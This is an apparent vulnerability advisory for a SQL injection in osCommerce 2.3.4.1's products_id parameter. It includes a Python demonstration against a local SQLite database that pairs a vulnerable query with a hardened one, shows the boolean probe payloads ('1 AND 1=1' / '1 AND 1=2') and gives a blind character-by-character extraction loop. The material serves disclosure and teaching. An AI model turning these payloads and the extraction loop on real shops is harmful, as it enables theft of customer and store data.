osCommerce 2.3.4.1: Attackers can steal sensitive database info
CVE-2019-25496
Summary
An unauthenticated attacker can exploit a SQL injection weakness in osCommerce 2.3.4.1 to read sensitive database information; no account or password is needed, only the ability to send requests to product_info.php. Anyone running osCommerce 2.3.4.1 is affected. No fixed release is listed at the time of writing, so operators should check with the vendor for an update and, meanwhile, restrict or validate the products_id parameter in front of the application to reduce the risk of data theft.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| oscommerce | oscommerce | 2.3.4.1 | – |
Original title
osCommerce 2.3.4.1 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the products_id parameter. Attackers can...
Original description
osCommerce 2.3.4.1 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the products_id parameter. Attackers can modify the products_id value in product_info.php requests and append boolean-based SQL injection payloads to extract sensitive database information.
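The description above states the mechanism but not what a boolean-based probe or the resulting extraction actually looks like. The following is an added example, not osCommerce code, that models the weakness in Python over an in-memory SQLite database (a stand-in for osCommerce's MySQL backend; the table, its rows, and the `products_price` column are constructed here, and the `substr`/`sqlite_master` syntax would be `SUBSTRING`/`information_schema` on MySQL). It shows the vulnerable concatenated query beside a hardened lookup, the true/false differential that reveals the injection, and how that one-bit oracle is turned into string extraction.

```python
import sqlite3

# Constructed sample catalogue standing in for the osCommerce products table.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (products_id INTEGER PRIMARY KEY, products_price REAL)")
    con.executemany("INSERT INTO products VALUES (?, ?)", [(1, 9.99), (2, 19.99), (3, 29.99)])
    return con


def vulnerable_lookup(con, products_id):
    """Models the weakness: the untrusted products_id string is concatenated
    straight into the WHERE clause, so any SQL appended to it is executed."""
    sql = "SELECT products_id, products_price FROM products WHERE products_id = " + products_id
    return con.execute(sql).fetchall()


def hardened_lookup(con, products_id):
    """Hardened form (assumed fix, not the vendor's): accept only a plain
    integer, then bind it as a parameter instead of concatenating."""
    if not products_id.isdigit():
        raise ValueError("products_id must be an integer")
    return con.execute(
        "SELECT products_id, products_price FROM products WHERE products_id = ?",
        (int(products_id),),
    ).fetchall()


def boolean_probe(lookup, con, products_id="1"):
    """Boolean-based differential check: the same id with a true and a false
    condition appended. If the two responses differ, the appended SQL was
    evaluated. A lookup that rejects the input is reported as not injectable."""
    try:
        true_rows = lookup(con, f"{products_id} AND 1=1")
        false_rows = lookup(con, f"{products_id} AND 1=2")
    except (ValueError, sqlite3.Error):
        return False
    return true_rows != false_rows


def oracle(con, condition):
    """One-bit oracle: returns True iff `condition` is true on the server,
    judged only by whether product 1 comes back (a boolean-based blind probe)."""
    return vulnerable_lookup(con, f"1 AND ({condition})") != []


def extract_string(con, subquery, max_len=32,
                   alphabet="abcdefghijklmnopqrstuvwxyz_0123456789"):
    """Recovers the result of `subquery` one character at a time by asking the
    oracle, for each position, which alphabet character matches. Stops when no
    character matches, i.e. at the end of the string."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(con, f"substr(({subquery}),{pos},1)='{ch}'"):
                out += ch
                break
        else:
            break
    return out


if __name__ == "__main__":
    con = make_db()
    print("vulnerable lookup injectable:", boolean_probe(vulnerable_lookup, con))
    print("hardened lookup injectable: ", boolean_probe(hardened_lookup, con))
    # Pull the first table name out of the schema without ever seeing query output.
    print("extracted:", extract_string(
        con, "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"))
```

The probe and the extraction loop need only the difference between "product returned" and "no product returned", which is why this class of bug is exploitable without credentials and without any error message being shown. The hardened lookup closes both avenues: the integer check rejects the appended clause, and the bound parameter means the value can never change the query's structure.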
NVD CVSS 3.1: 7.5
NVD CVSS 4.0: 8.8
Vulnerability type
CWE-89
SQL Injection
- https://www.exploit-db.com/exploits/46329 Exploit VDB Entry
- https://www.oscommerce.com Product
- https://www.vulncheck.com/advisories/oscommerce-sql-injection-via-productsid-par... Broken Link
Published: 27 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026